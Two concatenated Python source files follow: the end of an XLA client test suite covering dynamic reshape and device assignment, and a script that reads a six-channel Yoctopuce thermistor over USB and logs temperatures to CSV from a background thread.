arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
YoctoThermistor_FISH.py
|
#The files/folders that need to be in the executing folder are:
# yocto_api.py
# yocto_temperature.py
# folder: cdll
#Available from the Yoctopuce website:
#http://www.yoctopuce.com/EN/libraries.php Python libraries
#TODO:
#Make plotting function
#Buffer creation is commented out.
import os,sys
import time
import threading
import csv
import numpy as np
import collections
from yocto_api import *
from yocto_temperature import *
class FISH_thermistor():
"""
Class to initiate and read the temperature of a Yoctopuce Maxi Thermistor
"""
temperature = []
def __init__(self, logical_name = None, serial_number = None, **kwargs):
"""
Instatiate sensor, check if it works and opens temperature channels
Input:
`logical_name`: Logical name of the sensor (set in the Yoctopuce
software)
`serial_number`: Unchangable serial number of the sensor (can be found
in the Yoctopuce software)
One of the two is required.
"""
self.logical_name = logical_name
self.serial_number = serial_number
self.errmsg=YRefParam()
# Setup the API to use local USB devices
if YAPI.RegisterHub("usb", self.errmsg)!= YAPI.SUCCESS:
sys.exit("init error"+self.errmsg.value)
if self.logical_name != None:
self.target = self.logical_name
elif self.serial_number != None:
self.target = self.serial_number
elif self.serial_number == None and self.logical_name == None:
self.thermistor_die('Specify logical name or serial number')
#Instantiate sensor
self.sensor= YTemperature.FindTemperature(self.target + '.temperature1')
#Check if sensor is valid and live
if self.sensor is None :
self.thermistor_die('No module connected, check connection and name')
if not(self.sensor.isOnline()):
self.thermistor_die('device not connected')
#Get sensor serial number
self.serial=self.sensor.get_module().get_serialNumber()
#Initiate channels
self.init_channels()
def thermistor_die(self, msg):
sys.exit(msg+' (check name or USB cable)')
def init_channels(self):
global channel1, channel2, channel3, channel4, channel5, channel6
channel1 = YTemperature.FindTemperature(self.serial + '.temperature1')
channel2 = YTemperature.FindTemperature(self.serial + '.temperature2')
channel3 = YTemperature.FindTemperature(self.serial + '.temperature3')
channel4 = YTemperature.FindTemperature(self.serial + '.temperature4')
channel5 = YTemperature.FindTemperature(self.serial + '.temperature5')
channel6 = YTemperature.FindTemperature(self.serial + '.temperature6')
def read_temperature(self):
"""
get the temperature values of the 6 channels.
returns the 6 temperatures individualy (not as list).
"""
temp1 = channel1.get_currentValue()
temp2 = channel2.get_currentValue()
temp3 = channel3.get_currentValue()
temp4 = channel4.get_currentValue()
temp5 = channel5.get_currentValue()
temp6 = channel6.get_currentValue()
return temp1, temp2, temp3, temp4, temp5, temp6
def pr(self, time):
for i in range(time):
print(self.read_temperature())
YAPI.Sleep(1000)
class FISH_temperature_deamon():
"""
Class that can run the Yoctopuse Maxi Thermistor in the background
on a seperate thread and real live plot the data. All data will be
sved to a .csv file.
Input:
`logical_name`(str): logical name of the sensor
`serial_number(str): serial number of sensor
`exp_name`(str): Experiment name to track files
`buffer_size`(int): number of hours to plot in graph (default=2)
`log_interval`(int): Interval in seconds to save the temperature data.
default = 1 second
"""
def __init__(self, logical_name = None, serial_number = None,
exp_name = None, buffer_size=2, log_interval=1):
#Initiate sensor using the FISH_thermistor class
if logical_name != None:
self.sensor = FISH_thermistor(logical_name = logical_name)
if serial_number != None:
self.sensor = FISH_thermistor(serial_number = serial_number)
#Setup log file and exp name
self.exp_name = exp_name
#Creates log file and returns the file name
self.temp_log_filename = self.temp_log_file(self.exp_name)
#make buffers for graph with length in hours
#self.make_buffers(buffer_size)
self.log_interval = log_interval
# Worker that reads the temp form the sensor, saves it to file, plots and makes it available, every second.
def worker(self): #Can not pass the sensor as argument here, threading will complain
"""
thread worker function. Reads the temperature, saves it to a file
and makes the data available for other programs using the get_temp()
funciton.
"""
thread_name = threading.currentThread().getName()
print('Started FISH_temperature_deamon in the backround on thread: {}'.format(thread_name))
global current_temp
current_temp = []
count = 0
while True:
tic = time.time()
event_flag.clear()
#Get current temperature
current_temp = self.background_get_temp(self.sensor)
#write to file every interval
if count % self.log_interval == 0:
self.write_temp_log_file(self.temp_log_filename, current_temp)
count = 0
#updata data for plot
#self.update_temp_data_buffer(current_temp)
#update plot
count += 1
event_flag.set()
toc = time.time()
execute_time = toc - tic
if execute_time > 1:
execute_time = 0.001
time.sleep(1 - execute_time)
return current_temp
# Low level funcitons used in __init__
def temp_log_file(self, exp_name):
"""Make temperature log file, return file name"""
if not os.path.exists('Temperature_log_files'):
os.makedirs('Temperature_log_files')
if exp_name != None:
file_name = ('Temperature_log_files/' + exp_name + '_temp_log_' +
str(time.strftime('%d-%m-%Y_%H-%M-%S')) + '.csv')
else:
file_name = ('Temperature_log_files/' +'temp_log_' +
time.strftime('%d-%m-%Y_%H-%M-%S') + '.csv')
print(file_name)
self.logger_path = file_name
with open(file_name, 'w', newline='') as temp_log:
writer = csv.writer(temp_log)
header = [['Timestamp','Sensor1','Sensor2','Sensor3','Sensor4',
'Sensor5','Sensor6']]
writer.writerows(header)
return file_name
def make_buffers(self, buffer_size):
"""
Make 7 buffers for time and temperature
Input:
`buffer_size`(int): number of hours to buffer (default=2)
Buffers are fixed size 'deque' objects
"""
buffer_size = buffer_size * 60 * 60 #buffer size in seconds
self.time_data = collections.deque([None], maxlen=buffer_size)
self.sensor1_data = collections.deque([None], maxlen=buffer_size)
self.sensor2_data = collections.deque([None], maxlen=buffer_size)
self.sensor3_data = collections.deque([None], maxlen=buffer_size)
self.sensor4_data = collections.deque([None], maxlen=buffer_size)
self.sensor5_data = collections.deque([None], maxlen=buffer_size)
self.sensor6_data = collections.deque([None], maxlen=buffer_size)
# Low level funcitons used in the worker
def background_get_temp(self, sensor):
"""Get the current time and temperature from sensor"""
data = []
now = time.strftime('%d-%m-%Y_%H:%M:%S')
temperature = self.sensor.read_temperature()
data.append(now)
data += temperature
return data
def write_temp_log_file(self, file_name, data):
"""Write new data to temperature log file"""
with open(file_name, 'a', newline='') as temp_log:
writer = csv.writer(temp_log)
writer.writerows([data])
def update_temp_data_buffer(self, new_data):
"""Append new data to the data buffers"""
self.time_data.append(new_data[0])
self.sensor1_data.append(new_data[1])
self.sensor2_data.append(new_data[2])
self.sensor3_data.append(new_data[3])
self.sensor4_data.append(new_data[4])
self.sensor5_data.append(new_data[5])
self.sensor6_data.append(new_data[6])
# Starting the deamon in seperate thread
def deamon_start(self):
global event_flag
event_flag = threading.Event()
temp_thread = threading.Thread(target=self.worker)#, args = self.sensor)
temp_thread.setDaemon(True) #It will end the thread when the main process is done or quit
temp_thread.start()
time.sleep(1)
# Function to get the temperature from the main thread without interfeering with the worker.
def get_temp(self):
"""Get the current time and temperature from deamon"""
while not event_flag.isSet():
event_is_set = event_flag.wait(0.1)
return current_temp
if __name__ == "__main__":
x = FISH_temperature_deamon(serial_number = 'THRMSTR2-629D5')
x.deamon_start()
print('This is a test function that will print the temp every sec for the next 10 seconds')
for i in range (10):
print(x.get_temp())
#print('data buffer: ', x.sensor1_data[-20:])
time.sleep(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.